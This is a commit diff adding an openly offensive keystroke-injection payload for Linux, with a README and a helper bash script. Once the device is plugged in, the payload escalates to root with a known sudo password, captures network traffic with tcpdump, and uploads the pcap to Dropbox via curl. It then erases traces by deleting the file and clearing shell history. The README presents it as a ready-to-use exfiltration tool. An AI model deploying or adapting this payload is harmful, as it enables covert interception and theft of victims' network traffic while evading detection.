commit
ea645e3110
|
@ -0,0 +1,27 @@
|
||||||
|
# Exfiltrate Network Traffic - Linux ✅
|
||||||
|
|
||||||
|
A script used to exfiltrate the network traffic on a Linux machine.
|
||||||
|
|
||||||
|
**Category**: Exfiltrate
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to exfiltrate the network traffic on a Linux machine.
|
||||||
|
|
||||||
|
Opens a shell, get the network card name, get the network traffic using tcpdump, send the result to Dropbox, erase traces.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* Permissions
|
||||||
|
* Internet Connection
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the Dropbox token
|
||||||
|
* Set the sniffing filter
|
|
@ -0,0 +1,107 @@
|
||||||
|
|
||||||
|
REM #############################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Exfiltrate Network Traffic |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Exfiltration |
|
||||||
|
REM # Target : Linux |
|
||||||
|
REM # |
|
||||||
|
REM #############################################
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Permissions
|
||||||
|
REM - Internet Connection
|
||||||
|
|
||||||
|
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||||
|
DEFINE SUDO_PASS example
|
||||||
|
REM REQUIRED: Set what you want to sniff, for example tcp port 80
|
||||||
|
DEFINE SNIFFING example
|
||||||
|
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
|
||||||
|
DEFINE TOKEN example
|
||||||
|
REM Just a Dropbox const
|
||||||
|
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||||
|
REM Output file path packets.pcap, remember to use pcap extension
|
||||||
|
DEFINE FILE example.pcap
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### PERMISSIONS SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
STRINGLN sudo su
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN SUDO_PASS
|
||||||
|
DELAY 1000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### Network Traffic SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
STRING FILE_PATH="
|
||||||
|
STRING FILE
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRING filter_expression="
|
||||||
|
STRING SNIFFING
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Network card name
|
||||||
|
STRINGLN net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Network dump
|
||||||
|
STRINGLN tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Get PID
|
||||||
|
STRINGLN tcpdump_pid=$!
|
||||||
|
|
||||||
|
REM Set how long you want to sniff
|
||||||
|
DELAY 60000
|
||||||
|
|
||||||
|
REM Kill the process by PID
|
||||||
|
STRINGLN kill $tcpdump_pid
|
||||||
|
|
||||||
|
|
||||||
|
REM #### Exfiltrate SECTION ####
|
||||||
|
REM You can use whatever you want, i use Dropbox
|
||||||
|
|
||||||
|
STRING ACCESS_TOKEN="
|
||||||
|
STRING TOKEN
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRINGLN DROPBOX_FOLDER="/Exfiltration"
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRING curl -X POST
|
||||||
|
STRING DROPBOX_API_CONST
|
||||||
|
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
|
||||||
|
REM #### REMOVE TRACES ####
|
||||||
|
|
||||||
|
|
||||||
|
STRINGLN rm "$FILE_PATH"
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRINGLN history -c
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Exit from Sudo user
|
||||||
|
STRINGLN exit
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Close the shell
|
||||||
|
STRINGLN exit
|
|
@ -0,0 +1,12 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
filter_expression="tcp port 80"
|
||||||
|
|
||||||
|
net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||||
|
|
||||||
|
tcpdump -i "$net_card" $filter_expression -w packets.pcap &
|
||||||
|
tcpdump_pid=$!
|
||||||
|
|
||||||
|
sleep 60
|
||||||
|
|
||||||
|
kill $tcpdump_pid
|
Loading…
Reference in New Issue